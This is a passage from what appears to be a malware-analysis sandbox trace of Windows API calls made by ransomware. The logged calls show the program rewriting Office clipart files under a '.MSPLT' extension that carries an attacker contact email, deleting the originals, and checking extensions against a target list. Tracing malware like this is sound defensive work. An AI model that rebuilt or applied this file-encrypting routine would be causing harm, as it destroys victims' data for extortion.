lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.757] WriteFile (in: hFile=0x464, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.757] SetEndOfFile (hFile=0x464) returned 1 [0297.757] CloseHandle (hObject=0x464) returned 1 [0297.764] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.764] SetEndOfFile (hFile=0x480) returned 1 [0298.163] CloseHandle (hObject=0x480) returned 1 [0298.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0298.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.165] lstrlenW (lpString=".doc") returned 4 [0298.165] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0298.165] lstrlenW (lpString=".docx") returned 5 [0298.165] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0298.165] lstrlenW (lpString=".pdf") returned 4 [0298.165] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0298.165] lstrlenW (lpString=".xls") returned 4 [0298.165] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0298.165] lstrlenW (lpString=".xlsx") returned 5 [0298.166] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0298.166] lstrlenW (lpString=".ppt") returned 4 [0298.166] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString=".zip") returned 4 [0298.166] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0298.166] lstrlenW (lpString=".rar") returned 4 [0298.166] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0298.166] lstrlenW (lpString=".bz2") returned 4 [0298.166] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0298.166] lstrlenW (lpString=".7z") returned 3 [0298.166] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString=".dbf") returned 4 [0298.166] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString=".1cd") returned 4 [0298.166] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString=".jpg") returned 4 [0298.166] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.166] lstrlenW (lpString=".doc") returned 4 [0298.166] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0298.166] lstrlenW (lpString=".docx") returned 5 [0298.166] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0298.166] lstrlenW (lpString=".pdf") returned 4 [0298.167] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0298.167] lstrlenW (lpString=".xls") returned 4 [0298.167] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0298.167] lstrlenW (lpString=".xlsx") returned 5 [0298.167] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0298.167] lstrlenW (lpString=".ppt") returned 4 [0298.167] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0298.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.167] lstrlenW (lpString=".zip") returned 4 [0298.167] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0298.167] lstrlenW (lpString=".rar") returned 4 [0298.167] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0298.167] lstrlenW (lpString=".bz2") returned 4 [0298.167] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0298.167] lstrlenW (lpString=".7z") returned 3 [0298.167] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0298.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.167] lstrlenW (lpString=".dbf") returned 4 [0298.167] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0298.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.167] lstrlenW (lpString=".1cd") returned 4 [0298.167] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0298.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0298.167] lstrlenW (lpString=".jpg") returned 4 [0298.167] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0298.168] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.168] lstrlenW (lpString="BD19828_.WMF") returned 12 [0298.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.169] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=8772) returned 1 [0298.169] CloseHandle (hObject=0x480) returned 1 [0298.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf")) returned 0x220 [0298.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.170] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.170] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0298.171] GetLastError () returned 0x0 [0298.171] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x2244, lpOverlapped=0x0) returned 1 [0298.202] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x2250, lpOverlapped=0x0) returned 1 [0298.203] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.204] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.204] SetEndOfFile (hFile=0x44c) returned 1 [0298.204] CloseHandle (hObject=0x44c) returned 1 [0298.208] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.208] SetEndOfFile (hFile=0x480) returned 1 [0298.213] CloseHandle (hObject=0x480) returned 1 [0298.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0298.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.216] lstrlenW (lpString=".doc") returned 4 [0298.217] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.217] lstrlenW (lpString=".docx") returned 5 [0298.217] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.218] lstrlenW (lpString=".pdf") returned 4 [0298.218] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.218] lstrlenW (lpString=".xls") returned 4 [0298.218] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.218] lstrlenW (lpString=".xlsx") returned 5 [0298.218] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.218] lstrlenW (lpString=".ppt") returned 4 [0298.218] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.218] lstrlenW (lpString=".zip") returned 4 [0298.218] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.218] lstrlenW (lpString=".rar") returned 4 [0298.218] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.218] lstrlenW (lpString=".bz2") returned 4 [0298.218] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.218] lstrlenW (lpString=".7z") returned 3 [0298.218] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.219] lstrlenW (lpString=".dbf") returned 4 [0298.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.219] lstrlenW (lpString=".1cd") returned 4 [0298.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.219] lstrlenW (lpString=".jpg") returned 4 [0298.219] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.220] lstrlenW (lpString=".doc") returned 4 [0298.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.220] lstrlenW (lpString=".docx") returned 5 [0298.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.220] lstrlenW (lpString=".pdf") returned 4 [0298.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.220] lstrlenW (lpString=".xls") returned 4 [0298.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.220] lstrlenW (lpString=".xlsx") returned 5 [0298.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.220] lstrlenW (lpString=".ppt") returned 4 [0298.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.223] lstrlenW (lpString=".zip") returned 4 [0298.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.223] lstrlenW (lpString=".rar") returned 4 [0298.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.223] lstrlenW (lpString=".bz2") returned 4 [0298.223] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.223] lstrlenW (lpString=".7z") returned 3 [0298.223] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.223] lstrlenW (lpString=".dbf") returned 4 [0298.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.224] lstrlenW (lpString=".1cd") returned 4 [0298.224] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0298.224] lstrlenW (lpString=".jpg") returned 4 [0298.224] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.224] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.224] lstrlenW (lpString="BD19988_.WMF") returned 12 [0298.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.226] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=18304) returned 1 [0298.226] CloseHandle (hObject=0x480) returned 1 [0298.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x220 [0298.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.229] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.229] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0298.231] GetLastError () returned 0x0 [0298.231] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x4780, lpOverlapped=0x0) returned 1 [0298.672] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x4790, lpOverlapped=0x0) returned 1 [0298.674] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.674] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.674] SetEndOfFile (hFile=0x44c) returned 1 [0298.674] CloseHandle (hObject=0x44c) returned 1 [0298.676] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.676] SetEndOfFile (hFile=0x480) returned 1 [0298.680] CloseHandle (hObject=0x480) returned 1 [0298.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0298.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.682] lstrlenW (lpString=".doc") returned 4 [0298.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.682] lstrlenW (lpString=".docx") returned 5 [0298.682] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.682] lstrlenW (lpString=".pdf") returned 4 [0298.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.682] lstrlenW (lpString=".xls") returned 4 [0298.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.682] lstrlenW (lpString=".xlsx") returned 5 [0298.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.682] lstrlenW (lpString=".ppt") returned 4 [0298.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.682] lstrlenW (lpString=".zip") returned 4 [0298.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.682] lstrlenW (lpString=".rar") returned 4 [0298.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.682] lstrlenW (lpString=".bz2") returned 4 [0298.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.682] lstrlenW (lpString=".7z") returned 3 [0298.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString=".dbf") returned 4 [0298.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString=".1cd") returned 4 [0298.683] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString=".jpg") returned 4 [0298.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString=".doc") returned 4 [0298.683] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString=".docx") returned 5 [0298.683] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.683] lstrlenW (lpString=".pdf") returned 4 [0298.683] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString=".xls") returned 4 [0298.683] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.683] lstrlenW (lpString=".xlsx") returned 5 [0298.683] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.683] lstrlenW (lpString=".ppt") returned 4 [0298.683] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.683] lstrlenW (lpString=".zip") returned 4 [0298.684] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.684] lstrlenW (lpString=".rar") returned 4 [0298.684] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.684] lstrlenW (lpString=".bz2") returned 4 [0298.684] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.684] lstrlenW (lpString=".7z") returned 3 [0298.684] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.684] lstrlenW (lpString=".dbf") returned 4 [0298.684] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.684] lstrlenW (lpString=".1cd") returned 4 [0298.684] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0298.684] lstrlenW (lpString=".jpg") returned 4 [0298.684] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.684] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.684] lstrlenW (lpString="BL00105_.WMF") returned 12 [0298.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.685] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=880) returned 1 [0298.685] CloseHandle (hObject=0x480) returned 1 [0298.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf")) returned 0x220 [0298.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0298.686] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.687] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0298.687] GetLastError () returned 0x0 [0298.687] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x370, lpOverlapped=0x0) returned 1 [0299.287] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x380, lpOverlapped=0x0) returned 1 [0299.289] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.289] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: 